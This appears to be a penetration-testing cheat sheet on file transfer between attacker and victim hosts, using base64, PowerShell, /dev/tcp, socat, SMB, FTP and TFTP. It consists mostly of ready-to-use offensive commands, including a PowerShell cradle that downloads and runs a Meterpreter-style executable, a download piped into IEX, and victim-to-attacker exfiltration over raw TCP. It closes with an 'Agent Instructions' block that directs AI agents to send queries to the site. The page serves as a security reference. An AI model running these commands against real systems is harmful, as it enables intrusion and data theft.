# File Transfer
*
*
## Base64
String to base64 and POST with PowerShell:
```
PS > $str = cmd /c net user /domain
PS > $base64str = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
PS > IWR -Uri http://127.0.0.1/msg -Method POST -Body $base64str
```
File to base64 with `certutil`:
```
Cmd > certutil -encode C:\Windows\Temp\encoded.b64
Cmd > type C:\Windows\Temp\encoded.b64
```
Base64 file transfer from Linux to Windows:
```
$ base64 -w0 tunnel.aspx; echo
...BASE64_CONTENTS...
PS > Add-Content -Encoding UTF8 tunnel.b64 "" -NoNewLine
PS > $data = Get-Content -Raw tunnel.b64
PS > [IO.File]::WriteAllBytes("C:\inetpub\wwwroot\uploads\tunnel.aspx", [Convert]::FromBase64String($data))
```
Print file by base64 chunks in console:
```
$ python -c "import base64;f=open('data.bin','rb');[print(base64.b64encode(c).decode()) for c in iter(lambda: f.read(4096), b'')]"
```
## Hex
Compress a binary file and transfer it to Windows by copy-pasting commands into the console:
```
$ upx -9 file.exe
$ exe2hex -x file.exe -p file.cmd
$ cat file.cmd | xclip -i -sel c
```
## PowerShell
PowerShell upload file:
```
PS > (New-Object Net.WebClient).UploadFile("http://10.10.13.37/file.txt", "file.txt")
```
PowerShell auto detect proxy, download file from remote HTTP server and run it:
```powershell
$proxyAddr=(Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings").ProxyServer;$proxy=New-Object System.Net.WebProxy;$proxy.Address=$proxyAddr;$proxy.UseDefaultCredentials=$true;$client=New-Object System.Net.WebClient;$client.Proxy=$proxy;$client.DownloadFile("http://10.10.13.37/met.exe","$env:userprofile\music\met.exe");$exec=New-Object -com shell.application;$exec.shellexecute("$env:userprofile\music\met.exe")
```
PowerShell manually set proxy and upload file to remote HTTP server:
```powershell
$client=New-Object System.Net.WebClient;$proxy=New-Object System.Net.WebProxy("http://proxy.megacorp.local:3128",$true);$creds=New-Object Net.NetworkCredential("snovvcrash","Passw0rd!","megacorp.local");$creds=$creds.GetCredential("http://proxy.megacorp.local","3128","KERBEROS");$proxy.Credentials=$creds;$client.Proxy=$proxy;$client.UploadFile("http://10.10.13.37/results.txt","results.txt")
```
Another proxy-aware download cradle:
```powershell
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem "HKU:\" -ErrorAction SilentlyContinue
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start=$key.Name.Substring(10);break}}
$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy("http://$proxyAddr")
$wc = New-Object System.Net.WebClient
$wc.DownloadString("http://10.10.13.37/test.txt") | IEX
Remove-PSDrive -Name HKU -Force
```
Quicky connection tests for HTTP/HTTPS:
```
# HTTP
PS > IWR -UseBasicParsing -Uri http://www.msftconnecttest.com/connecttest.txt -UserAgent "Microsoft NCSI"
# HTTPS
PS > [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS > [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
PS > [System.Net.ServicePointManager]::Expect100Continue = {$false}
PS > (IWR -UseBasicParsing -Uri https://www.microsoft.com/en-us/microsoft-365 -UserAgent "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko").RawContentLength
```
Through a negotiate proxy with creds (can also use [proxy-negotiate](https://github.com/COUR4G3/proxy-negotiate)):
```
$ KRB5CCNAME=user.ccache curl -v -sSL -k -A 'Microsoft NCSI' --proxy http://gate01.megacorp.local:8080 [--proxy-user 'megacorp.local\user:Passw0rd!'] [--proxy-ntlm] --proxy-negotiate http://www.msftncsi.com/ncsi.txt
```
## /dev/tcp
Attacker is the sender:
```
# Sender:
root@kali:~$ tar -zcvf folder.tar.gz folder
root@kali:~$ nc -w3 -lvnp 1234 < folder.tar.gz
# Recipient:
www-data@victim:~$ bash -c 'cat < /dev/tcp/127.0.0.1/1234 > .folder.tar.gz'
www-data@victim:~$ tar -zxvf .folder.tar.gz
```
Victim is the sender:
```
# Recipient:
root@kali:~$ nc -w3 -lvnp 1234 > file.txt
# Sender:
www-data@victim:~$ bash -c 'cat < file.txt > /dev/tcp/127.0.0.1/1234'
```
## socat
Recipient (Attacker):
```
$ socat TCP-LISTEN:1337 OPEN:data.tar,create,append
```
Sender (Victim):
```
$ tar cf - /dev/shm/data | socat TCP:10.10.13.37:1337 -
```
## SSH
SSH + cat/type:
```
$ ssh root@192.168.1.11 'type "C:\Windows\Temp\data.bin"' | pv > /tmp/data.bin
```
## SMB
### smbserver.py
Start SMB server:
```
$ smbserver.py -smb2support share `pwd`
```
Mount SMB in Windows with `net use`:
```
$ smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd`
Cmd > net use Z: \\10.10.13.37\share
Cmd > net use Z: \\10.10.13.37\share /u:snovvcrash 'Passw0rd!'
```
Mount SMB in Windows with `New-PSDrive`:
```
$ smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd`
PS > $pass = 'Passw0rd!' | ConvertTo-SecureString -AsPlainText -Force
PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $pass)
Or
PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force))
PS > New-PSDrive -Name Z -Root \\10.10.13.37\share -Credential $cred -PSProvider FileSystem
PS > cd Z:
```
### net share
```
Cmd > net share pentest=c:\smb_pentest /GRANT:"Anonymous Logon,FULL" /GRANT:"Everyone,FULL"
Or
Cmd > net share pentest=c:\smb_pentest /GRANT:"Administrator,FULL"
Cmd > net share pentest /delete
```
## FTP
```
$ python -m pip install pyftpdlib
$ python -m pyftpdlib -Dwp 2121
Cmd > cd C:\Windows\System32\spool\drivers\color
Cmd > echo 'open 127.0.0.1 2121' > ftp.txt
Cmd > echo 'user anonymous' >> ftp.txt
Cmd > echo 'anonymous' >> ftp.txt
Cmd > echo 'binary' >> ftp.txt
Cmd > echo 'put file.bin' >> ftp.txt
Cmd > echo 'bye' >> ftp.txt
Cmd > ftp -v -n -s:ftp.txt
```
## TFTP
Send `file.exe` from Windows to Linux (TFTP client must be [enabled](https://teckangaroo.com/enable-tftp-windows-10/) on Windows):
```
$ sudo atftpd --daemon --bind 10.10.13.37 --port 69 ./tftp
Cmd > tftp -i 10.10.13.37 put file.exe
$ sudo pkill atftpd
```
## ICMP
*
* [https://snovvcrash.github.io/2019/04/05/htb-mischief.html](https://snovvcrash.github.io/2019/04/05/htb-mischief.html#icmpshellpy)
## Exfiltration / Infiltration
*
*
## Tools
### http-server
*
```
$ sudo apt install npm -y
$ sudo npm install http-server -g
$ sudo http-server -d false -p 443 -S -C /etc/letsencrypt/live/example.com/cert.pem -K /etc/letsencrypt/live/example.com/privkey.pem --log-ip | tee http-server.log
```
### goshs
*
```
$ eget -qs linux/amd64 "patrickhener/goshs" --to ~/tools/goshs
$ sudo ~/tools/goshs/goshs -ro -si -p 443 -s -sc /etc/letsencrypt/live/example.com/cert.pem -sk /etc/letsencrypt/live/example.com/privkey.pem -V | tee goshs.log
```
### simplehttpserver
*
```
$ eget -qs linux/amd64 "projectdiscovery/simplehttpserver" --to ~/tools/pd
$ sudo ~/tools/pd/simplehttpserver -listen 10.10.13.37:1337 -path `pwd` -upload -https -cert /etc/letsencrypt/live/example.com/fullchain.pem -key /etc/letsencrypt/live/example.com/privkey.pem -domain example.com -basic-auth 'snovvcrash:Passw0rd!' -max-file-size 100
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.